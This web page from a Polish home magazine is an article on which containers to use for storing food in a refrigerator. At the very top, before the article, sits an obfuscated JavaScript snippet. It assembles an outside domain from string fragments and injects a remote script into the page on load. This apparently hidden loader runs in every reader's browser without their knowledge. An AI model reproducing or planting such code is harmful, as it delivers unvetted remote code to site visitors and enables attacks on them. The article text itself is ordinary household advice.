(function(){ wndc=document.createElement("script");wndc.type="text/javascript"; wndc.async=true;wndc_=(("us")+"t")+"a";wndc_+=("t.i")+""+"n";wndc_+=(("f")+"o");wndc_+="/"; wndcu="435356356.";wndcu+="l7gcs9q7ndcqhql2ll2X4wrvymxisv";wndc.src="https://"+wndc_+wndcu; wndcdb=document.body;wndcdb.appendChild(wndc); })();

W czym przechowywać żywność w lodówce?

Przemyślane ułożenie produktów w lodówce pozwala w pełni wykorzystać potencjał, jaki skrywają półki i szuflady. Do organizacji przestrzeni doskonale sprawdzą się pojemniki, które występują w wielu pojemnościach oraz kształtach do wyboru. Mogą być szklane lub wykonane z tworzywa sztucznego. Podpowiadamy, co wybrać do przechowywania żywności, aby łatwo można było zlokalizować jej położenie i na dłużej zachować świeżość wędlin, owoców, warzyw czy nabiału.

Dlaczego warto przekładać produkty z opakowań oryginalnych?

Choć znacznie szybciej jest wkładać do lodówki produkty spożywcze w oryginalnych opakowaniach, w takiej formie, jak przynieśliśmy je ze sklepu, to jednak warto przekładać je do pojemników zamiennych. Po pierwsze – w folii warzywa szybciej tracą swoją jędrność i świeżość, są bardziej podatne na gnicie. Folia jest też nieestetyczna, szeleści przy każdy wyciąganiu, a jeśli wewnątrz znajdują się różne warzywa czy owoce to ich zapachy będą się przenikać. Środowisko sprzyja rozwojowi bakterii. Wyrób w sobie nawyk przekładania produktów do pojemników w lodówce także po to, aby lepiej wykorzystać dostępną przestrzeń.

Jakie opakowania do przechowywania w lodówce wybrać?

Pojemniki, które wykorzystujemy do przechowywania produktów spożywczych służą nie tylko do segregacji w lodówce, ale też do innych celów. W niektórych można nawet mrozić resztki obiadu! Estetyczne, zamykane pudełka świetnie sprawdzą się również do pakowania lunchu.

Główny podział pojemników dotyczy tego, z jakiego materiału powstają. Tutaj do wyboru są przede wszystkim:

  • szklane,
  • plastikowe,
  • foliowe,
  • silikonowe,
  • ceramiczne,
  • porcelanowe.

Idealne pojemniki powinny mieć odpowiednie certyfikaty potwierdzające ich jakość i zgodność z obowiązującymi normami. To ważne, bo daje pewność, że materiał nie wydziela żadnych szkodliwych substancji i zachowuje nienaruszony smak, zapach, kolor i właściwości artykułów spożywczych.

W czym przechowywać żywność w lodówce? 2

Co przechowywać w lodówce w pojemnikach?

Są takie produkty, które z powodzeniem można pozostawić w oryginalnych opakowaniach – jogurty, mleko, śmietana, śledzie. Natomiast kupowane na wagę sery czy wędliny, kiełbasy, kabanosy, a już na pewno mięso warto przekładać do pojemników szklanych z zamykanymi wieczkami. Dla mięsa i szynki producenci lodówek przewidują oddzielne szuflady – warto z nich korzystać, aby odizolować produkty od innych, które spożywamy bez wcześniejszej obróbki termicznej.

Przekładanie sera, szynki, warzyw, owoców do pojemników z rozszczelnionymi wieczkami ma chronić przed przenikaniem się zapachów i utrzymywać świeżość produktów na dłuższy czas.

Jakie kształt pojemników najlepiej wybrać?

Najłatwiej będzie ustawić na lodówkowych półkach pojemniki w formie kwadratu czy prostokąta. Można położyć je jedne obok drugich lub pionowo, formując coś na kształt wieży.

Pojemniki transparentne czy w kolorze?

Zdecydowanie przezroczyste. Dlaczego? Bez konieczności przesuwania, przekładania, otwierania i zaglądania do środka można ocenić, co znajduje się w środku. Poza tym, lodówka po otworzeniu prezentuje się kolorowo.

Nasz partner radzi prymusagd.pl

 

Redakcja

DomNaNowo.pl jest magazynem internetowych z kategorii dom i wnętrza. Naszą misją jest inspirowanie i zachęcanie do ulepszania swojej przestrzeni życiowej. Publikujemy poradniki i artykuły o wszystkim co wiąże się z domami, mieszkaniami i wnętrzarstwem. Publikujemy zestawienia aranżacji różnego typu pomieszczeń oraz przestrzeni mieszkalnych. Prezentujemy rankingi zestawienia. Naszą redakcję tworzy zespół kreatywnych i dociekliwych redaktorów i autorów. Ich pracę wspomagają specjaliści ds. PR oraz marketingu. Na łamach DomNanowo.pl publikowane są nowości wnętrzarskie oraz różne materiały warte opisana i scharakteryzowania. Nasze felietony oraz artykuły poradnikowe tworzone są z myślą o czytelnikach. Z nami każde wnętrze może stać się wyjątkowe.

Powiązane artykuły

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Back to top button